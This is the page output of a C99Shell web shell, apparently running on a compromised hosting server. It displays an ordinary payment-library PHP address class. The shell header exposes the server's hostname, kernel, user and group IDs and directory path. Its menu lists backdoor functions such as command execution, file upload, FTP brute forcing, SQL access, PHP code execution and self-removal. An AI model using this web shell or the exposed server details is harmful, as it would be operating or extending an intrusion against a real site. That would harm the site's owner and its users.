!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/iyzico/iyzipay-php/src/Iyzipay/Model/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     IyziupAddress.php (2.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Iyzipay\Model;

use 
Iyzipay\BaseModel;
use 
Iyzipay\JsonBuilder;
use 
Iyzipay\RequestStringBuilder;

class 
IyziupAddress extends BaseModel
{
    private 
$alias;
    private 
$addressLine1;
    private 
$addressLine2;
    private 
$zipCode;
    private 
$contactName;
    private 
$city;
    private 
$country;

    public function 
getAlias()
    {
        return 
$this->alias;
    }

    public function 
setAlias($alias)
    {
        
$this->alias $alias;
    }

    public function 
getAddressLine1()
    {
        return 
$this->addressLine1;
    }

    public function 
setAddressLine1($addressLine1)
    {
        
$this->addressLine1 $addressLine1;
    }

    public function 
getAddressLine2()
    {
        return 
$this->addressLine2;
    }

    public function 
setAddressLine2($addressLine2)
    {
        
$this->addressLine2 $addressLine2;
    }

    public function 
getZipCode()
    {
        return 
$this->zipCode;
    }

    public function 
setZipCode($zipCode)
    {
        
$this->zipCode $zipCode;
    }

    public function 
getContactName()
    {
        return 
$this->contactName;
    }

    public function 
setContactName($contactName)
    {
        
$this->contactName $contactName;
    }

    public function 
getCity()
    {
        return 
$this->city;
    }

    public function 
setCity($city)
    {
        
$this->city $city;
    }

    public function 
getCountry()
    {
        return 
$this->country;
    }

    public function 
setCountry($country)
    {
        
$this->country $country;
    }

    public function 
getJsonObject()
    {
        return 
JsonBuilder::create()
            ->
add("alias"$this->getAlias())
            ->
add("addressLine1"$this->getAddressLine1())
            ->
add("addressLine2"$this->getAddressLine2())
            ->
add("zipCode"$this->getZipCode())
            ->
add("contactName"$this->getContactName())
            ->
add("city"$this->getCity())
            ->
add("country"$this->getCountry())
            ->
getObject();
    }

    public function 
toPKIRequestString()
    {
        return 
RequestStringBuilder::create()
            ->
append("alias"$this->getAlias())
            ->
append("addressLine1"$this->getAddressLine1())
            ->
append("addressLine2"$this->getAddressLine2())
            ->
append("zipCode"$this->getZipCode())
            ->
append("contactName"$this->getContactName())
            ->
append("city"$this->getCity())
            ->
append("country"$this->getCountry())
            ->
getRequestString();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--